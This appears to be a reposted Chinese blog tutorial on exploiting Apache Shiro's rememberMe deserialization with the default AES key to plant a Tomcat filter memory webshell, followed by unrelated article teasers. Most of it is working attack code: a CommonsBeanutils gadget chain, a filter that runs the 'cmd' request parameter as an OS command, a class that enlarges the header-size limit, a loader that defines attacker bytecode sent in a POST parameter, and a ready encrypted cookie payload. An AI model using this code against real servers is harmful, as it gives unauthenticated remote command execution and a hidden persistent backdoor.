shiro注入filter内存马(绕过长度限制)

shiro环境

https://github.com/yyhuni/shiroMemshell(实验环境)
在这里插入图片描述
这里用的
Client_memshell.java

package com.example.demo;import javassist.ClassPool;
import javassist.CtClass;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.util.ByteSource;public class Client_memshell {public static void main(String[] args) throws Exception {ClassPool pool = ClassPool.getDefault();CtClass clazz = pool.get(BehinderFilter.class.getName());byte[] payloads = new CommonsBeanutils1Shiro().getPayload(clazz.toBytecode());AesCipherService aes = new AesCipherService();byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");ByteSource ciphertext = aes.encrypt(payloads, key);System.out.printf(ciphertext.toString());}
}

BehinderFilter.java

package com.example.demo;import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.lang.reflect.Field;
import org.apache.catalina.core.StandardContext;
import java.lang.reflect.InvocationTargetException;
import java.util.Map;
import java.io.IOException;
import org.apache.catalina.loader.WebappClassLoaderBase;
import org.apache.tomcat.util.descriptor.web.FilterDef;
import org.apache.tomcat.util.descriptor.web.FilterMap;
import java.lang.reflect.Constructor;
import org.apache.catalina.core.ApplicationFilterConfig;
import org.apache.catalina.Context;
import javax.servlet.*;public class BehinderFilter extends AbstractTranslet implements Filter {static {try {final String name = "evil";final String URLPattern = "/*";WebappClassLoaderBase webappClassLoaderBase =(WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();Field Configs = standardContext.getClass().getDeclaredField("filterConfigs");Configs.setAccessible(true);Map filterConfigs = (Map) Configs.get(standardContext);BehinderFilter behinderFilter = new BehinderFilter();FilterDef filterDef = new FilterDef();filterDef.setFilter(behinderFilter);filterDef.setFilterName(name);filterDef.setFilterClass(behinderFilter.getClass().getName());/*** 将filterDef添加到filterDefs中*/standardContext.addFilterDef(filterDef);FilterMap filterMap = new FilterMap();filterMap.addURLPattern(URLPattern);filterMap.setFilterName(name);filterMap.setDispatcher(DispatcherType.REQUEST.name());standardContext.addFilterMapBefore(filterMap);Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);constructor.setAccessible(true);ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);filterConfigs.put(name, filterConfig);} catch (NoSuchFieldException ex) {ex.printStackTrace();} catch (InvocationTargetException ex) {ex.printStackTrace();} catch (IllegalAccessException ex) {ex.printStackTrace();} catch (NoSuchMethodException ex) {ex.printStackTrace();} catch (InstantiationException ex) {ex.printStackTrace();}}@Overridepublic void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}@Overridepublic void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}@Overridepublic void init(FilterConfig filterConfig) throws ServletException {}@Overridepublic void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {System.out.println("Do Filter ......");String cmd;if ((cmd = servletRequest.getParameter("cmd")) != null) {Process process = Runtime.getRuntime().exec(cmd);java.io.BufferedReader bufferedReader = new java.io.BufferedReader(new java.io.InputStreamReader(process.getInputStream()));StringBuilder stringBuilder = new StringBuilder();String line;while ((line = bufferedReader.readLine()) != null) {stringBuilder.append(line + '\n');}servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());servletResponse.getOutputStream().flush();servletResponse.getOutputStream().close();return;}filterChain.doFilter(servletRequest, servletResponse);System.out.println("doFilter");}@Overridepublic void destroy() {}
}

CommonsBeanutils1Shiro.java

package com.example.demo;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.BeanComparator;import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.PriorityQueue;public class CommonsBeanutils1Shiro {public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {Field field = obj.getClass().getDeclaredField(fieldName);field.setAccessible(true);field.set(obj, value);}public byte[] getPayload(byte[] clazzBytes) throws Exception {TemplatesImpl obj = new TemplatesImpl();setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes});setFieldValue(obj, "_name", "HelloTemplatesImpl");setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);// stub data for replacement laterqueue.add("1");queue.add("1");setFieldValue(comparator, "property", "outputProperties");setFieldValue(queue, "queue", new Object[]{obj, obj});// ==================// 生成序列化字符串ByteArrayOutputStream barr = new ByteArrayOutputStream();ObjectOutputStream oos = new ObjectOutputStream(barr);oos.writeObject(queue);oos.close();return barr.toByteArray();}
}

进行base64和aes加密
在这里插入图片描述
然后将这段输入漏洞处rememberme=
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
注意:
一开始输入这段很长的payload返回包会报400,如下:在这里插入图片描述
这是因为tomcat有最大请求头的长度限制,我本地添加如下(修改maxHTTPHeaderSize)
在这里插入图片描述
即可正常返回200,注入成功,因此实战过程还有绕过长度限制
https://zhuanlan.zhihu.com/p/516836433

同时代码种爆红

绕过长度限制(maxHttpHeaderSize)

网上给了三种解决方式
1.修改maxHttpHeaderSize
2.将class bytes使用gzip+base64压缩编码(暂不研究)
3.从POST请求体中发送字节码数据(强烈推荐)
第一种:

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;@SuppressWarnings("all")
public class TomcatHeaderSize extends AbstractTranslet {static {try {java.lang.reflect.Field contextField = org.apache.catalina.core.StandardContext.class.getDeclaredField("context");java.lang.reflect.Field serviceField = org.apache.catalina.core.ApplicationContext.class.getDeclaredField("service");java.lang.reflect.Field requestField = org.apache.coyote.RequestInfo.class.getDeclaredField("req");java.lang.reflect.Field headerSizeField = org.apache.coyote.http11.Http11InputBuffer.class.getDeclaredField("headerBufferSize");java.lang.reflect.Method getHandlerMethod = org.apache.coyote.AbstractProtocol.class.getDeclaredMethod("getHandler",null);contextField.setAccessible(true);headerSizeField.setAccessible(true);serviceField.setAccessible(true);requestField.setAccessible(true);getHandlerMethod.setAccessible(true);org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase =(org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();org.apache.catalina.core.ApplicationContext applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(webappClassLoaderBase.getResources().getContext());org.apache.catalina.core.StandardService standardService = (org.apache.catalina.core.StandardService) serviceField.get(applicationContext);org.apache.catalina.connector.Connector[] connectors = standardService.findConnectors();for (int i = 0; i < connectors.length; i++) {if (4 == connectors[i].getScheme().length()) {org.apache.coyote.ProtocolHandler protocolHandler = connectors[i].getProtocolHandler();if (protocolHandler instanceof org.apache.coyote.http11.AbstractHttp11Protocol) {Class[] classes = org.apache.coyote.AbstractProtocol.class.getDeclaredClasses();for (int j = 0; j < classes.length; j++) {// org.apache.coyote.AbstractProtocol$ConnectionHandlerif (52 == (classes[j].getName().length()) || 60 == (classes[j].getName().length())) {java.lang.reflect.Field globalField = classes[j].getDeclaredField("global");java.lang.reflect.Field processorsField = org.apache.coyote.RequestGroupInfo.class.getDeclaredField("processors");globalField.setAccessible(true);processorsField.setAccessible(true);org.apache.coyote.RequestGroupInfo requestGroupInfo = (org.apache.coyote.RequestGroupInfo) globalField.get(getHandlerMethod.invoke(protocolHandler, null));java.util.List list = (java.util.List) processorsField.get(requestGroupInfo);for (int k = 0; k < list.size(); k++) {org.apache.coyote.Request tempRequest = (org.apache.coyote.Request) requestField.get(list.get(k));// 10000 为修改后的 headersize headerSizeField.set(tempRequest.getInputBuffer(),10000);}}}// 10000 为修改后的 headersize ((org.apache.coyote.http11.AbstractHttp11Protocol) protocolHandler).setMaxHttpHeaderSize(10000);}}}} catch (Exception e) {}}@Overridepublic void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}@Overridepublic void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}
}

思路是改变org.apache.coyote.http11.AbstractHttp11Protocol的maxHeaderSize的大小,这个值会影响新的Request的inputBuffer时的对于header的限制

第三种的实现如下:

tomcat+shiro环境下

还是利用CommonsBeanutils1Shiro类,Client_memshell类,ClassDataLoader为最终写好的绕过类(相当于加载类)
ClassDataLoader.java

package com.example.demo;import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;public class ClassDataLoader extends AbstractTranslet{public ClassDataLoader() throws Exception {Object o;String s;String classData = null;boolean done = false;Thread[] ts = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), "threads");for (int i = 0; i < ts.length; i++) {Thread t = ts[i];if (t == null) {continue;}s = t.getName();if (!s.contains("exec") && s.contains("http")) {o = getFV(t, "target");if (!(o instanceof Runnable)) {continue;}try {o = getFV(getFV(getFV(o, "this$0"), "handler"), "global");} catch (Exception e) {continue;}java.util.List ps = (java.util.List) getFV(o, "processors");for (int j = 0; j < ps.size(); j++) {Object p = ps.get(j);o = getFV(p, "req");Object conreq = o.getClass().getMethod("getNote", new Class[]{int.class}).invoke(o, new Object[]{new Integer(1)});classData = (String) conreq.getClass().getMethod("getParameter", new Class[]{String.class}).invoke(conreq, new Object[]{new String("classData")});byte[] bytecodes = org.apache.shiro.codec.Base64.decode(classData);java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class});defineClassMethod.setAccessible(true);Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), new Object[]{bytecodes, new Integer(0), new Integer(bytecodes.length)});cc.newInstance();done = true;if (done) {break;}}}}}public Object getFV(Object o, String s) throws Exception {java.lang.reflect.Field f = null;Class clazz = o.getClass();while (clazz != Object.class) {try {f = clazz.getDeclaredField(s);break;} catch (NoSuchFieldException e) {clazz = clazz.getSuperclass();}}if (f == null) {throw new NoSuchFieldException(s);}f.setAccessible(true);return f.get(o);}@Overridepublic void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}@Overridepublic void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}}

在这里插入图片描述
和上面的实现利用不一样的是,这里我们用Client_memshell来对绕过的加载类进行AES+base64加密,将得到的结果放到头部cookie的rememberme=处
本次实验加载器到的结果如下(每次运行都不一样,所以以后用的时候还需要代码生成,不能直接搬运)

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

而我们的恶意类BehinderFilter(也就是内存马),进行base64编码+url编码,放到classData参数(这里必须是classData其他不行)处

cat /root/Desktop/BehinderFilter.class|base64 |sed ':label;N;s/\n//;b label'

在这里插入图片描述
在这里插入图片描述
然后放到数据包中即可

成功截图:
在这里插入图片描述
在这里插入图片描述
之后完善分段加载方式

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/65008.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

c语言大一期末复习

l例1&#xff1a;输入一行字符&#xff0c;统计其中空格的个数 #include<stdio.h> int main( ) { char ch; int count0; while((chgetchar())!\n) { if(ch ) { count1; } } printf("%d\n",coun…

心血管疾病中医怎么调理

心血管疾病在中医范畴内属于胸痹&#xff0c;中医会根据不同的证候&#xff0c;如心血瘀阻证、寒凝心脉证、痰浊闭阻证、心肾阴虚证、气阴两虚证等&#xff0c;采取不同的调理方法。以下是一些中医调理心血管疾病的常用手段&#xff1a; 一、中药调理 ‌心血瘀阻证‌&#xf…

群晖利用acme.sh自动申请证书并且自动重载证书的问题解决

前言 21年的时候写了一个在群晖&#xff08;黑群晖&#xff09;下利用acme.sh自动申请Let‘s Encrypt的脚本工具 群晖使用acme自动申请Let‘s Encrypt证书脚本&#xff0c;自动申请虽然解决了&#xff0c;但是自动重载一直是一个问题&#xff0c;本人也懒&#xff0c;一想到去…

raid 状态查看 storcli64

场景 当磁盘报错的时候使用该命令排查 fdisk -l /dev/sdb fdisk: cannot open /dev/sdb: Input/output error进一步使用 smartctl 排查 smartctl -a /dev/sdb 输出 smartctl 7.1 2019-12-30 r5022 [x86_64-linux-5.4.0-144-generic] (local build) Copyright (C) 2002-19, B…

《探索PyTorch计算机视觉:原理、应用与实践》

一、PyTorch 与计算机视觉的奇妙相遇 在当今数字化的时代&#xff0c;计算机视觉作为一门能够赋予机器 “看” 的能力的技术&#xff0c;正以前所未有的速度蓬勃发展&#xff0c;深刻地改变着我们的生活和众多行业的运作模式。从智能手机中的人脸识别解锁&#xff0c;到安防监控…

使用VSCode Debugger 调试 React项目

一般我们调试代码时&#xff0c;用的最多的应该就是console.log方式了&#xff0c;还有的是使用Chrome DevTools 通过在对应的 sourcemap代码位置打断点进行调试&#xff0c;除了上面两种方式外还有一种更好用的调试方式&#xff1a; VSCode Debugger。 VSCode Debugger可以直…

mapbox基础,加载mapbox官方地图

&#x1f468;‍⚕️ 主页&#xff1a; gis分享者 &#x1f468;‍⚕️ 感谢各位大佬 点赞&#x1f44d; 收藏⭐ 留言&#x1f4dd; 加关注✅! &#x1f468;‍⚕️ 收录于专栏&#xff1a;mapbox 从入门到精通 文章目录 一、&#x1f340;前言1.1 ☘️mapboxgl.Map 地图对象…

汽车IVI中控开发入门及进阶(三十八):手机投屏HiCar开发

手机投屏轻松实现手机与汽车的无缝连接,导航、音乐、通话等功能应有尽有,还支持更多第三方应用,让车载互联生活更加丰富多彩。 HiCar在兼容性和开放性上更具优势。 手机投屏可以说是车机的杀手级应用,大大拓宽了车机的可用性范围。其中华为推出的HiCar就是非常好用的一种。…

Elasticsearch:确保业务规则与语义搜索无缝协作

作者&#xff1a;来自 Elastic Kathleen DeRusso 利用查询规则与语义搜索和重新排序相结合的强大功能。 更多阅读&#xff1a; Elasticsearch 8.10 中引入查询规则 - query rules Elasticsearch 查询规则现已正式发布 - query rules 你是否知道查询规则&#xff08;query ru…

把riscv32位系统弄懂1:riscv32 CPU指令学习

Riscv手册 首先下载手册&#xff1a;文件下载----中国开放指令生态(RISC-V)联盟 从这个页面下载riscv-spec-v2.1中文版 也可以下载中科大的这本&#xff1a;RISC-V手册 Riscv32指令集包括基础指令集和一些扩展指令集&#xff0c;比如在ESP32C3技术手册中&#xff0c;写到E…

全国消费水平系统|Java|SSM|JSP|

【技术栈】 1⃣️&#xff1a;架构: B/S、MVC 2⃣️&#xff1a;系统环境&#xff1a;Windowsh/Mac 3⃣️&#xff1a;开发环境&#xff1a;IDEA、JDK1.8、Maven、Mysql5.7 4⃣️&#xff1a;技术栈&#xff1a;Java、Mysql、SSM、Mybatis-Plus、JSP、jquery,html 5⃣️数据库可…

达梦数据库-读写分离集群部署

读写分离集群部署 读写分离集群由一个主库以及一个或者多个(最多可以配置 8 个)实时备库组成&#xff0c;基于实时归档实现的高性能数据库集群&#xff0c;不但提供数据保护、容灾等数据守护基本功能&#xff0c;还具有读写操作自动分离、负载均衡等特性。同时可以配置确认监视…

【ALGC】探秘 ALGC—— 卓越数据处理能力的科技瑰宝

我的个人主页 我的领域&#xff1a;人工智能篇&#xff0c;希望能帮助到大家&#xff01;&#xff01;&#xff01;&#x1f44d;点赞 收藏❤ 在大数据时代&#xff0c;如何高效地处理和分析海量数据是一个核心挑战。ALGC&#xff08;Advanced Learning and Generalized Comp…

docker仓库用户认证

保证实验环境纯净删除启动的docker 1.安装建立认证文件的工具包 [rootlocalhost ~]# yum install httpd-tools -y 2.创建目录存放认证文件 [rootlocalhost ~]# mkdir auth [rootlocalhost ~]# htpasswd -Bc auth/.htpasswd lee #-B 强制使用最安全加密方式&#xff0c;默认用m…

(OCPP服务器)SteVe编译搭建全过程

注意&#xff1a;建议使用3.6.0&#xff0c;我升级到3.7.1&#xff0c;并没有多什么新功能&#xff0c;反而电表的实时数据只能看到累计电能了&#xff0c;我回退了就正常&#xff0c;数据库是兼容的&#xff0c;java版本换位java11&#xff0c;其他不变就好 背景&#xff1a;…

【IMU:视觉惯性SLAM系统】

视觉惯性SLAM系统简介 相机&#xff08;单目/双目/RGBD)与IMU结合起来就是视觉惯性&#xff0c;通常以单目/双目IMU为主。 IMU里面有个小芯片可以测量角速度与加速度&#xff0c;可分为6轴(6个自由度)和9轴&#xff08;9个自由度&#xff09;IMU&#xff0c;具体的关于IMU的介…

Linux 基本使用和程序部署

1. Linux 环境搭建 1.1 环境搭建方式 主要有 4 种&#xff1a; 直接安装在物理机上。但是Linux桌面使用起来非常不友好&#xff0c;所以不建议。[不推荐]。使用虚拟机软件&#xff0c;将Linux搭建在虚拟机上。但是由于当前的虚拟机软件(如VMWare之类的)存在一些bug&#xff…

c++------------------函数

函数定义 语法格式 函数定义包括函数头和函数体。函数头包含返回类型、函数名和参数列表。函数体是用花括号{}括起来的代码块&#xff0c;用于实现函数的功能。例如&#xff0c;定义一个计算两个整数之和的函数&#xff1a; int add(int a, int b) {return a b; }这里int是返回…

如何在centos系统上挂载U盘

